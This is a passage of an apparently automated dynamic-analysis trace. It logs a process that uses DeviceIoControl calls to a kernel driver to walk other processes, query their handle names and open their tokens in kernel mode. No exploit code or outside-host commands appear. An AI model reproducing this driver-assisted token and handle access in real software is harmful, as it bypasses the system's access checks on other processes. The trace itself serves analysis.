nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x86, lpOverlapped=0x0) returned 1 [0246.037] PsLookupProcessByProcessId (in: ProcessId=0x824, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.037] PsAcquireProcessExitSynchronization () returned 0x0 [0246.037] KeStackAttachProcess (in: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880053c85d0) [0246.037] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800205acf0, HandleInformation=0x0) returned 0x0 [0246.037] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.037] PsReleaseProcessExitSynchronization () returned 0x2 [0246.037] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x12 [0246.037] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800312d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800312d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.037] ObfDereferenceObject (Object=0xfffffa800205acf0) returned 0x1 [0246.037] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.037] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.037] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.037] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.037] PsLookupProcessByProcessId (in: ProcessId=0x824, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.037] PsAcquireProcessExitSynchronization () returned 0x0 [0246.037] KeStackAttachProcess (in: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002088b30, ApcState=0xfffff880053c85d0) [0246.037] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.037] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.038] PsReleaseProcessExitSynchronization () returned 0x2 [0246.038] ObfDereferenceObject (Object=0xfffffa8002088b30) returned 0x12 [0246.038] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.038] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.038] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.038] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x834) returned 0xc8 [0246.038] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.038] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa8002095470, HandleInformation=0x0) returned 0x0 [0246.038] ObOpenObjectByPointer (in: Object=0xfffffa8002095470, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.038] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x14 [0246.038] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.038] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.038] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.038] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.038] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.041] CloseHandle (hObject=0xc4) returned 1 [0246.041] CloseHandle (hObject=0xc8) returned 1 [0246.041] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.041] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.041] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.041] PsAcquireProcessExitSynchronization () returned 0x0 [0246.041] KeStackAttachProcess (in: PROCESS=0xfffffa8002095470, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002095470, ApcState=0xfffff880053c85d0) [0246.041] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002091f20, HandleInformation=0x0) returned 0x0 [0246.041] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.041] PsReleaseProcessExitSynchronization () returned 0x2 [0246.041] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x12 [0246.041] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030c5044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030c5044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.041] ObfDereferenceObject (Object=0xfffffa8002091f20) returned 0x1 [0246.041] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.041] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.041] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.041] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x78, lpOverlapped=0x0) returned 1 [0246.041] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.041] PsAcquireProcessExitSynchronization () returned 0x0 [0246.042] KeStackAttachProcess (in: PROCESS=0xfffffa8002095470, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002095470, ApcState=0xfffff880053c85d0) [0246.042] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002091d30, HandleInformation=0x0) returned 0x0 [0246.042] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.042] PsReleaseProcessExitSynchronization () returned 0x2 [0246.042] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x12 [0246.042] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.042] ObfDereferenceObject (Object=0xfffffa8002091d30) returned 0x1 [0246.042] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.042] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.042] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.042] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.042] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.042] PsAcquireProcessExitSynchronization () returned 0x0 [0246.042] KeStackAttachProcess (in: PROCESS=0xfffffa8002095470, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8002095470, ApcState=0xfffff880053c85d0) [0246.042] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.042] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.042] PsReleaseProcessExitSynchronization () returned 0x2 [0246.042] ObfDereferenceObject (Object=0xfffffa8002095470) returned 0x12 [0246.042] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.042] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.042] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.042] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.043] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x844) returned 0xc8 [0246.043] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.043] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020acb30, HandleInformation=0x0) returned 0x0 [0246.043] ObOpenObjectByPointer (in: Object=0xfffffa80020acb30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.043] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x14 [0246.043] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.043] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.043] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.043] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.043] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.045] CloseHandle (hObject=0xc4) returned 1 [0246.045] CloseHandle (hObject=0xc8) returned 1 [0246.045] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.045] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.045] PsLookupProcessByProcessId (in: ProcessId=0x844, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.045] PsAcquireProcessExitSynchronization () returned 0x0 [0246.045] KeStackAttachProcess (in: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880053c85d0) [0246.045] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800205a390, HandleInformation=0x0) returned 0x0 [0246.045] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.045] PsReleaseProcessExitSynchronization () returned 0x2 [0246.045] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x12 [0246.045] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.045] ObfDereferenceObject (Object=0xfffffa800205a390) returned 0x1 [0246.046] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.046] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.046] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.046] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x98, lpOverlapped=0x0) returned 1 [0246.046] PsLookupProcessByProcessId (in: ProcessId=0x844, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.046] PsAcquireProcessExitSynchronization () returned 0x0 [0246.046] KeStackAttachProcess (in: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880053c85d0) [0246.046] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020aeb00, HandleInformation=0x0) returned 0x0 [0246.046] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.046] PsReleaseProcessExitSynchronization () returned 0x2 [0246.046] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x12 [0246.046] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.046] ObfDereferenceObject (Object=0xfffffa80020aeb00) returned 0x1 [0246.046] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.046] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.046] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.046] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.046] PsLookupProcessByProcessId (in: ProcessId=0x844, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.046] PsAcquireProcessExitSynchronization () returned 0x0 [0246.046] KeStackAttachProcess (in: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020acb30, ApcState=0xfffff880053c85d0) [0246.046] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.046] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.047] PsReleaseProcessExitSynchronization () returned 0x2 [0246.047] ObfDereferenceObject (Object=0xfffffa80020acb30) returned 0x12 [0246.047] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.047] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.047] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.047] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.047] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x854) returned 0xc8 [0246.047] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.047] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020b8b30, HandleInformation=0x0) returned 0x0 [0246.047] ObOpenObjectByPointer (in: Object=0xfffffa80020b8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 [0246.047] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x14 [0246.047] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000069c, DesiredAccess=0x8, TokenHandle=0xfffffa8002162b80 | out: TokenHandle=0xfffffa8002162b80*=0xc4) returned 0x0 [0246.047] ZwClose (Handle=0xffffffff8000069c) returned 0x0 [0246.047] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.047] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0246.047] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0246.141] CloseHandle (hObject=0xc4) returned 1 [0246.141] CloseHandle (hObject=0xc8) returned 1 [0246.141] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.141] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0246.141] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.141] PsAcquireProcessExitSynchronization () returned 0x0 [0246.141] KeStackAttachProcess (in: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880053c85d0) [0246.141] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f4cb00, HandleInformation=0x0) returned 0x0 [0246.141] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.141] PsReleaseProcessExitSynchronization () returned 0x2 [0246.141] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x12 [0246.141] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800315b044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800315b044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.141] ObfDereferenceObject (Object=0xfffffa8001f4cb00) returned 0x1 [0246.141] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.141] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.141] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.141] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x6e, lpOverlapped=0x0) returned 1 [0246.141] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.141] PsAcquireProcessExitSynchronization () returned 0x0 [0246.141] KeStackAttachProcess (in: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880053c85d0) [0246.142] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80020b8400, HandleInformation=0x0) returned 0x0 [0246.142] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.142] PsReleaseProcessExitSynchronization () returned 0x2 [0246.142] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x12 [0246.142] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800310c044, Length=0x800, ReturnLength=0xfffff880053c8508 | out: ObjectNameInfo=0xfffffa800310c044, ReturnLength=0xfffff880053c8508) returned 0x0 [0246.142] ObfDereferenceObject (Object=0xfffffa80020b8400) returned 0x1 [0246.142] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.142] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.142] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1f0b20 [0246.142] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1f0b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1f0b20*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0246.142] PsLookupProcessByProcessId (in: ProcessId=0x854, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0246.142] PsAcquireProcessExitSynchronization () returned 0x0 [0246.142] KeStackAttachProcess (in: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa80020b8b30, ApcState=0xfffff880053c85d0) [0246.142] ObReferenceObjectByHandle (in: Handle=0x64, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b01, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffff8a000ad3a70, HandleInformation=0x0) returned 0x0 [0246.142] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0246.142] PsReleaseProcessExitSynchronization () returned 0x2 [0246.142] ObfDereferenceObject (Object=0xfffffa80020b8b30) returned 0x12 [0246.142] ObQueryNameString (in: Object=0xfffff8a000ad3a70, ObjectNameInfo=0xfffffa800312e044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800312e044, ReturnLength=0xfffff880053c8550) returned 0x0 [0246.142] ObfDereferenceObject (Object=0xfffff8a000ad3a70) returned 0x50 [0246.142] IofCompleteRequest (Irp=0xfffffa80028d6780, PriorityBoost=0) [0246.142] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1f0b20 | out: hHeap=0x1b0000) returned 1 [0246.143] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x864) returned 0xc8 [0246.143] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0246.143] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880053c8668, HandleInformation=0x0 | out: Object=0xfffff880053c8668*=0xfffffa80020c1760, HandleInformation=0x0) returned 0x0 [0246.143] ObOpenObjectByPointer (in: Object=0xfffffa80020c1760, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880053c8670 | out: Handle=0xfffff880053c8670*=0xffffffff8000069c) returned 0x0 